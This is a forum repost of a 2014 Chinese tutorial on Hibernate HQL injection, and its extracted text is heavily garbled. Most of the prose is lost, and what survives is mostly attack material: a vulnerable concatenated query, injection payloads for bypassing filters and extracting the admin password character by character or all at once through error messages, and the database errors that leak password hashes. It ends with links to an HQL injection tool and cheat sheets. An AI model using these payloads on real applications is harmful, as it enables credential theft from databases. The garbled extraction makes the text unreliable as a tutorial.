[8016] 2014-05-12_HibernateHQL注入攻击入门

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-17
2014-05-12_HibernateHQL注入攻击入门 H i b e r n a t e   H Q L F r e e B u f   2 0 1 4 - 0 5 - 1 2   T a s k i l l e r S Q L D B M S M y S Q L O r a c l e M S S Q L H i b e r n a t e H i b e r n a t e H i b e r n a t e O R M t a b l e s J a v a . N E T 使 N H i b e r n a t e J a v a H Q L h i b e r n a t e S Q L h i b e r n a t e H Q L H i b e r n a t e s e s s i o n . c r e a t e Q u e r y ( " f r o m   B o o k   w h e r e   t i t l e   l i k e   ' % "   +   u s e r I n p u t   +   " % '   a n d   p u b l i s h e d   =   t r u e " ) b o o k s f r o m   B o o k w h e r e   t i t l e   l i k e   ' % '   o r   1 = 1   o r   ' ' = ' % '   a n d   p u b l i s h e d   =   t r u e 访 访 U N I O N f r o m   B o o k w h e r e   t i t l e   l i k e   ' % '   a n d   p r o m o C o d e   l i k e   ' A % '   o r   1 = 2   a n d   ' ' = ' % '   a n d   p u b l i s h e d   =   t r u e f r o m   B o o k w h e r e   t i t l e   l i k e   ' % '   a n d   p r o m o C o d e   l i k e   ' B % '   o r   1 = 2   a n d   ' ' = ' % '   a n d   p u b l i s h e d   =   t r u e / H i b e r n a t e H i b e r n a t e
f r o m   B o o k w h e r e   t i t l e   l i k e   ' % '         a n d   D O E S N T _ E X I S T = 1   a n d   ' ' = ' % '         a n d   p u b l i s h e d   =   t r u e o r g . h i b e r n a t e . e x c e p t i o n . S Q L G r a m m a r E x c e p t i o n :   C o l u m n   " D O E S N T _ E X I S T "   n o t   f o u n d ;   S Q L   s t a t e m e n t : s e l e c t   b o o k 0 _ . i d   a s   i d 2 1 _ ,   b o o k 0 _ . a u t h o r   a s   a u t h o r 2 1 _ ,   b o o k 0 _ . p r o m o C o d e   a s   p r o m o 3 _ 2 1 _ ,   b o o k 0 _ . t i t l e   a s   t i t l e 2 1 _ ,   b o o k 0 _ . p u b l i s h e d   a s   p u b l i s h e d 2 1 _   f r o m   B o o k   b o o k 0 _   w h e r e   b o o k 0 _ . t i t l e   l i k e   ' % '   o r   D O E S N T _ E X I S T = ' % '   a n d   b o o k 0 _ . p u b l i s h e d = 1   [ 4 2 1 2 2 - 1 5 9 ] H i b e r n a t e 访 访 H Q L U N I O N j o i n 使 访 使 U s e r f r o m   B o o k w h e r e   t i t l e   l i k e   ' % '   a n d   ( s e l e c t   s u b s t r i n g ( p a s s w o r d , 1 , 1 )   f r o m   U s e r   w h e r e   u s e r n a m e = ' a d m i n ' )   =   ' a '   o r   ' ' = ' % '   a n d   p u b l i s h e d   =   t r u e f r o m   B o o k w h e r e   t i t l e   l i k e   ' % 1 1 '   a n d   ( s e l e c t   p a s s w o r d   f r o m   U s e r   w h e r e   u s e r n a m e = ' a d m i n ' ) = 1   o r   ' ' = ' % '   a n d   p u b l i s h e d   =   t r u e H i b e r n a t e D a t a   c o n v e r s i o n   e r r o r   c o n v e r t i n g   " 3 f 3 f f 0 c d b f a 0 d 5 1 5 f 8 e 3 7 5 1 e 4 e d 9 8 a b e " ;   S Q L   s t a t e m e n t : s e l e c t   b o o k 0 _ . i d   a s   i d 1 8 _ ,   b o o k 0 _ . a u t h o r   a s   a u t h o r 1 8 _ ,   b o o k 0 _ . p r o m o t i o n C o d e   a s   p r o m o t i o 3 _ 1 8 _ ,   b o o k 0 _ . t i t l e   a s   t i t l e 1 8 _ ,   b o o k 0 _ . v i s i b l e   a s   v i s i b l e 1 8 _   f r o m   B o o k   b o o k 0 _   w h e r e   b o o k 0 _ . t i t l e   l i k e   ' % 1 1 '   a n d   ( s e l e c t   u s e r 1 _ . p a s s w o r d   f r o m   U s e r   u s e r 1 _   w h e r e   u s e r 1 _ . u s e r n a m e   =   ' a d m i n ' ) = 1   o r   ' ' = ' % '   a n d   b o o k 0 _ . p u b l i s h e d = 1   [ 2 2 0 1 8 - 1 5 9 ] H i b e r n a t e S E L E C T W H E R E H Q L - > S Q L J a v a g r o u p _ c o n c a t , a r r a y _ a g g ,   g r o u p _ c o n c a t f r o m   B o o k w h e r e   t i t l e   l i k e   ' % 1 1 '         a n d   ( s e l e c t   c a s t ( g r o u p _ c o n c a t ( p a s s w o r d )   a s   s t r i n g )   f r o m   U s e r ) = 1         o r ' ' = ' % '         a n d   p u b l i s h e d   =   t r u e
D a t a   c o n v e r s i o n   e r r o r   c o n v e r t i n g " 3 f 3 f f 0 c d b f a 0 d 5 1 5 f 8 e 3 7 5 1 e 4 e d 9 8 a b e , 7 9 a 4 1 d 7 1 c 3 1 1 2 8 f f a b 8 1 a c 8 d f 2 0 6 9 f 9 c , b 7 f e 6 f 6 a 1 0 2 4 d b 6 e 5 6 0 2 7 a e b 5 5 8 f 9 e 6 8 " ; S Q L   s t a t e m e n t :   s e l e c t   b o o k 0 _ . i d   a s   i d 1 8 _ ,   b o o k 0 _ . a u t h o r   a s   a u t h o r 1 8 _ ,   b o o k 0 _ . p r o m o t i o n C o d e a s   p r o m o t i o 3 _ 1 8 _ ,   b o o k 0 _ . t i t l e   a s   t i t l e 1 8 _ ,   b o o k 0 _ . v i s i b l e   a s   v i s i b l e 1 8 _   f r o m   B o o k   b o o k 0 _ w h e r e   b o o k 0 _ . t i t l e   l i k e   ' % 1 1 '   a n d   ( s e l e c t   c a s t ( g r o u p _ c o n c a t ( u s e r 1 _ . p a s s w o r d )   a s   v a r c h a r ( 2 5 5 ) )   f r o m   U s e r   u s e r 1 _ ) = 1   o r   ' ' = ' % '   a n d   b o o k 0 _ . p u b l i s h e d = 1   [ 2 2 0 1 8 - 1 5 9 ] H i b e r n a t e H Q L 使 H i b e r n a t e J a v a   w e b F i n d B u g s H i b e r n a t e   A P I H Q L :   T h e   H i b e r n a t e   Q u e r y   L a n g u a g e   :   H i b e r n a t e   h t t p : / / d o c s . j b o s s . o r g / h i b e r n a t e / o r m / 3 . 3 / r e f e r e n c e / e n / h t m l / q u e r y h q l . h t m l H Q L m a p : H Q L h t t p s : / / g i t h u b . c o m / P a u l S e c / H Q L m a p S Q L   I n j e c t i o n   W i k i   :   D B M S S Q L h t t p : / / w w w . s q l i n j e c t i o n w i k i . c o m / P e n t e s t m o n k e y S Q L   I n j e c t i o n   c h e a t s h e e t s :   S Q L h t t p : / / p e n t e s t m o n k e y . n e t / c a t e g o r y / c h e a t - s h e e t / s q l - i n j e c t i o n [ v i a   h 3 x s t r e a m ] 使
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则